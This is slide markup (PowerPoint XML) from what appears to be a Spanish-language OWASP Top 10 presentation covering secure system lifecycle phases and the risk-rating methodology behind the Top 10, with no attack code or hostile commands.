                <a:gd name="connsiteY6" fmla="*/ 1541065 h 1541065"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 1114893"/>
                <a:gd name="connsiteY7" fmla="*/ 1355246 h 1541065"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 1114893"/>
                <a:gd name="connsiteY8" fmla="*/ 185819 h 154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893" h="1541065">
                  <a:moveTo>
                    <a:pt x="0" y="185819"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="83194"/>
                    <a:pt x="83194" y="0"/>
                    <a:pt x="185819" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="929074" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1031699" y="0"/>
                    <a:pt x="1114893" y="83194"/>
                    <a:pt x="1114893" y="185819"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1114893" y="1355246"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1114893" y="1457871"/>
                    <a:pt x="1031699" y="1541065"/>
                    <a:pt x="929074" y="1541065"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="185819" y="1541065"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="83194" y="1541065"/>
                    <a:pt x="0" y="1457871"/>
                    <a:pt x="0" y="1355246"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="185819"/>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6335" tIns="75380" rIns="96335" bIns="75380" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" algn="ctr" defTabSz="466725">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Despliegue, Pruebas y Puesta en Producción</a:t>
              </a:r>
              <a:endPar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Forma libre: forma 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F1951AD-1AA8-43F2-8C65-DD85B9D5B6F0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1152537" y="7801260"/>
              <a:ext cx="5425004" cy="1092090"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1092090"/>
                <a:gd name="connsiteY0" fmla="*/ 182019 h 5425004"/>
                <a:gd name="connsiteX1" fmla="*/ 182019 w 1092090"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 5425004"/>
                <a:gd name="connsiteX2" fmla="*/ 910071 w 1092090"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 5425004"/>
                <a:gd name="connsiteX3" fmla="*/ 1092090 w 1092090"/>
                <a:gd name="connsiteY3" fmla="*/ 182019 h 5425004"/>
                <a:gd name="connsiteX4" fmla="*/ 1092090 w 1092090"/>
                <a:gd name="connsiteY4" fmla="*/ 5242985 h 5425004"/>
                <a:gd name="connsiteX5" fmla="*/ 910071 w 1092090"/>
                <a:gd name="connsiteY5" fmla="*/ 5425004 h 5425004"/>
                <a:gd name="connsiteX6" fmla="*/ 182019 w 1092090"/>
                <a:gd name="connsiteY6" fmla="*/ 5425004 h 5425004"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 1092090"/>
                <a:gd name="connsiteY7" fmla="*/ 5242985 h 5425004"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 1092090"/>
                <a:gd name="connsiteY8" fmla="*/ 182019 h 5425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2090" h="5425004">
                  <a:moveTo>
                    <a:pt x="1055448" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1075685" y="0"/>
                    <a:pt x="1092090" y="404820"/>
                    <a:pt x="1092090" y="904187"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1092090" y="4520817"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1092090" y="5020184"/>
                    <a:pt x="1075685" y="5425004"/>
                    <a:pt x="1055448" y="5425004"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="36642" y="5425004"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="16405" y="5425004"/>
                    <a:pt x="0" y="5020184"/>
                    <a:pt x="0" y="4520817"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="904187"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="404820"/>
                    <a:pt x="16405" y="0"/>
                    <a:pt x="36642" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1055448" y="0"/>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7311" tIns="161311" rIns="89311" bIns="177136" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>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Operar incluyendo la administración de seguridad de la aplicación (por ej. administración de parches).</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Aumentar la conciencia de seguridad de los usuarios y administrar conflictos de usabilidad vs seguridad.</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Panificar y gestionar cambios, por ejemplo la migración a nuevas versiones de la aplicación u otros componentes como sistema operativo, interfaces de software y bibliotecas.</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Actualizar toda la documentación, incluyendo la Base de Datos de Gestión de la Seguridad (CMDB) y la arquitectura de seguridad</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-AU"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orma libre: forma 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8555E6B-E31E-469B-8342-05222E1F1F1E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="158400" y="7796077"/>
              <a:ext cx="990000" cy="1097273"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1114893"/>
                <a:gd name="connsiteY0" fmla="*/ 185819 h 1290023"/>
                <a:gd name="connsiteX1" fmla="*/ 185819 w 1114893"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1290023"/>
                <a:gd name="connsiteX2" fmla="*/ 929074 w 1114893"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 1290023"/>
                <a:gd name="connsiteX3" fmla="*/ 1114893 w 1114893"/>
                <a:gd name="connsiteY3" fmla="*/ 185819 h 1290023"/>
                <a:gd name="connsiteX4" fmla="*/ 1114893 w 1114893"/>
                <a:gd name="connsiteY4" fmla="*/ 1104204 h 1290023"/>
                <a:gd name="connsiteX5" fmla="*/ 929074 w 1114893"/>
                <a:gd name="connsiteY5" fmla="*/ 1290023 h 1290023"/>
                <a:gd name="connsiteX6" fmla="*/ 185819 w 1114893"/>
                <a:gd name="connsiteY6" fmla="*/ 1290023 h 1290023"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 1114893"/>
                <a:gd name="connsiteY7" fmla="*/ 1104204 h 1290023"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 1114893"/>
                <a:gd name="connsiteY8" fmla="*/ 185819 h 129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4893" h="1290023">
                  <a:moveTo>
                    <a:pt x="0" y="185819"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="83194"/>
                    <a:pt x="83194" y="0"/>
                    <a:pt x="185819" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="929074" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1031699" y="0"/>
                    <a:pt x="1114893" y="83194"/>
                    <a:pt x="1114893" y="185819"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1114893" y="1104204"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1114893" y="1206829"/>
                    <a:pt x="1031699" y="1290023"/>
                    <a:pt x="929074" y="1290023"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="185819" y="1290023"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="83194" y="1290023"/>
                    <a:pt x="0" y="1206829"/>
                    <a:pt x="0" y="1104204"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="185819"/>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96335" tIns="75380" rIns="96335" bIns="75380" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" algn="ctr" defTabSz="466725">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Operación y Gestión del cambio</a:t>
              </a:r>
              <a:endPar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Forma libre: forma 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C55C543-48E1-462A-8CEE-8BEA15305D7F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1152537" y="9073122"/>
              <a:ext cx="5430308" cy="632851"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 632850"/>
                <a:gd name="connsiteY0" fmla="*/ 105477 h 5430307"/>
                <a:gd name="connsiteX1" fmla="*/ 105477 w 632850"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 5430307"/>
                <a:gd name="connsiteX2" fmla="*/ 527373 w 632850"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 5430307"/>
                <a:gd name="connsiteX3" fmla="*/ 632850 w 632850"/>
                <a:gd name="connsiteY3" fmla="*/ 105477 h 5430307"/>
                <a:gd name="connsiteX4" fmla="*/ 632850 w 632850"/>
                <a:gd name="connsiteY4" fmla="*/ 5324830 h 5430307"/>
                <a:gd name="connsiteX5" fmla="*/ 527373 w 632850"/>
                <a:gd name="connsiteY5" fmla="*/ 5430307 h 5430307"/>
                <a:gd name="connsiteX6" fmla="*/ 105477 w 632850"/>
                <a:gd name="connsiteY6" fmla="*/ 5430307 h 5430307"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 632850"/>
                <a:gd name="connsiteY7" fmla="*/ 5324830 h 5430307"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 632850"/>
                <a:gd name="connsiteY8" fmla="*/ 105477 h 543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850" h="5430307">
                  <a:moveTo>
                    <a:pt x="620558" y="4"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="627346" y="4"/>
                    <a:pt x="632850" y="405219"/>
                    <a:pt x="632850" y="905071"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="632850" y="4525236"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="632850" y="5025088"/>
                    <a:pt x="627346" y="5430303"/>
                    <a:pt x="620558" y="5430303"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="12292" y="5430303"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5504" y="5430303"/>
                    <a:pt x="0" y="5025088"/>
                    <a:pt x="0" y="4525236"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="905071"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="405219"/>
                    <a:pt x="5504" y="4"/>
                    <a:pt x="12292" y="4"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="620558" y="4"/>
                  </a:ln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4894" tIns="138893" rIns="66893" bIns="154719" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>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Cualquier dato requerido debe ser almacenado. Otros datos deben ser eliminados de forma segura.</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Retirar la aplicación en forma segura, incluyendo el borrado de cuentas, roles y permisos no usados.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="171450" lvl="1" indent="-171450" defTabSz="444500">
                <a:spcBef>
                  <a:spcPts val="200"/>
                </a:spcBef>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="es-AR" sz="82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Establecer el estado de la aplicación a “retirada” en la CMDB.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Forma libre: forma 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0135D27-FBA1-480C-9869-3157CE503907}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="158400" y="9054670"/>
              <a:ext cx="990000" cy="632851"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1115983"/>
                <a:gd name="connsiteY0" fmla="*/ 131846 h 791063"/>
                <a:gd name="connsiteX1" fmla="*/ 131846 w 1115983"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 791063"/>
                <a:gd name="connsiteX2" fmla="*/ 984137 w 1115983"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 791063"/>
                <a:gd name="connsiteX3" fmla="*/ 1115983 w 1115983"/>
                <a:gd name="connsiteY3" fmla="*/ 131846 h 791063"/>
                <a:gd name="connsiteX4" fmla="*/ 1115983 w 1115983"/>
                <a:gd name="connsiteY4" fmla="*/ 659217 h 791063"/>
                <a:gd name="connsiteX5" fmla="*/ 984137 w 1115983"/>
                <a:gd name="connsiteY5" fmla="*/ 791063 h 791063"/>
                <a:gd name="connsiteX6" fmla="*/ 131846 w 1115983"/>
                <a:gd name="connsiteY6" fmla="*/ 791063 h 791063"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 1115983"/>
                <a:gd name="connsiteY7" fmla="*/ 659217 h 791063"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 1115983"/>
                <a:gd name="connsiteY8" fmla="*/ 131846 h 79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983" h="791063">
                  <a:moveTo>
                    <a:pt x="0" y="131846"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="59029"/>
                    <a:pt x="59029" y="0"/>
                    <a:pt x="131846" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="984137" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1056954" y="0"/>
                    <a:pt x="1115983" y="59029"/>
                    <a:pt x="1115983" y="131846"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1115983" y="659217"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1115983" y="732034"/>
                    <a:pt x="1056954" y="791063"/>
                    <a:pt x="984137" y="791063"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="131846" y="791063"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="59029" y="791063"/>
                    <a:pt x="0" y="732034"/>
                    <a:pt x="0" y="659217"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="131846"/>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0527" tIns="59572" rIns="80527" bIns="59572" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" algn="ctr" defTabSz="466725">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Retiro</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> de </a:t>
              </a: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Sistemas</a:t>
              </a:r>
              <a:endParaRPr lang="es-AR" sz="1000" b="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1991329925"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-4257" y="1026853"/>
          <a:ext cx="6858000" cy="600541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06787">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Sobre los riesgos que conllevan las vulnerabilidades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38451">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="110000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>La Metodología de Evaluación del Riesgo para el Top 10 está basada en la </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>Metodología de Evaluación de Riesgo de OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. Para cada categoría del Top 10, estimamos el riesgo típico que representa cada vulnerabilidad en una aplicación web, al observar los factores de probabilidad comunes y los factores de impacto para esa vulnerabilidad. Luego, ordenamos el Top 10 de acuerdo a todas aquellas vulnerabilidades que típicamente presentan el riesgo más significativo para una aplicación. Estos factores son actualizados con cada edición del Top 10 a medida que cambian y evolucionan.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="110000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>La Metodología de Evaluación de Riesgo de OWASP define numerosos factores para ayudar a calcular el riesgo de una vulnerabilidad identificada. Sin embargo, el Top 10 debe basarse en generalidades en lugar de vulnerabilidades específicas en aplicaciones y APIs reales. En consecuencia, nunca podremos ser tan precisos para calcular los riesgos en sus propias aplicaciones. El propietario o administrador del sistema están mejor capacitados para juzgar la importancia de sus aplicaciones y datos, cuáles son sus amenazas, cómo ha sido construido y cómo está siendo operado el sistema.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="110000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Nuestra metodología incluye tres factores de probabilidad para cada vulnerabilidad (prevalencia, posibilidad de detección y facilidad de explotación) y un factor de impacto técnico. La escala de riesgos para cada factor utiliza el rango de 1 (bajo) a 3 (alto). La prevalencia de una vulnerabilidad es un factor que normalmente no es necesario calcular. Para los datos de prevalencia, se han obtenido estadísticas de un conjunto de organizaciones distintas (como se menciona en la sección de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="100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Agradecimientos</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>) y hemos calculado el promedio de los datos agregados, para elaborar el Top 10 de probabilidad de existencia según la prevalencia. Esta información fue posteriormente combinada con los dos factores de probabilidad (posibilidad de detección y facilidad de explotación) para calcular la tasa de probabilidad de cada vulnerabilidad. Esta tasa fue multiplicada por el impacto técnico promedio estimado de cada elemento, para finalmente elaborar la clasificación de riesgo total para cada elemento del Top 10 (cuanto mayor sea el resultado, mayor será el riesgo). La detectabilidad, la facilidad de explotación y el impacto se calcularon analizando los CVEs reportados asociados a las 10 categorías principales.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="110000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="950" b="1" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Nota: </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tenga en consideración que este enfoque no tiene en cuenta la probabilidad del agente de amenaza. Tampoco se tiene en cuenta ninguno de los detalles técnicos asociados a su aplicación en particular. Cualquiera de éstos factores podrían afectar significativamente la probabilidad total de que un atacante encuentre y explote una vulnerabilidad en particular. Esta clasificación tampoco tiene en consideración el impacto real sobre su negocio. Su organización deberá decidir cuánto riesgo de seguridad en las aplicaciones y APIs está dispuesta a asumir dada su cultura, su industria y el entorno regulatorio. El propósito de OWASP Top 10 no es hacer el análisis de riesgo por usted.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="110000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A modo de ejemplo, este diagrama ilustra los cálculos del riesgo de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" b="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A6:2017 Configuración de Seguridad Incorrecta</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" b="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456084">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endParaRPr lang="es-AR" sz="1000" b="1"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88729127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t>+R</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Titel 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-AR" noProof="0" dirty="0"/>
              <a:t>Notas sobre los Riesgos</a:t>
            </a:r>
            <a:endParaRPr lang="es-AR" noProof="0" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Imagen 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{329E34A6-0ACD-4662-9583-C4EB015232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3" y="6573180"/>
            <a:ext cx="6858000" cy="2466252"/>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4036433351"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="939599"/>
          <a:ext cx="6858000" cy="146196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s-AR" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Resumen de factores de Riesgo del Top 10</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10000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>La siguiente tabla presenta un resumen del Top 10 y los factores de riesgo que hemos asignado a cada uno de ellos.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="110000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Estos factores fueron determinados basándose en las estadísticas disponibles y la experiencia del equipo del OWASP Top 10. Para entender estos riesgos en una aplicación en particular u organización, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" u="sng" dirty="0">
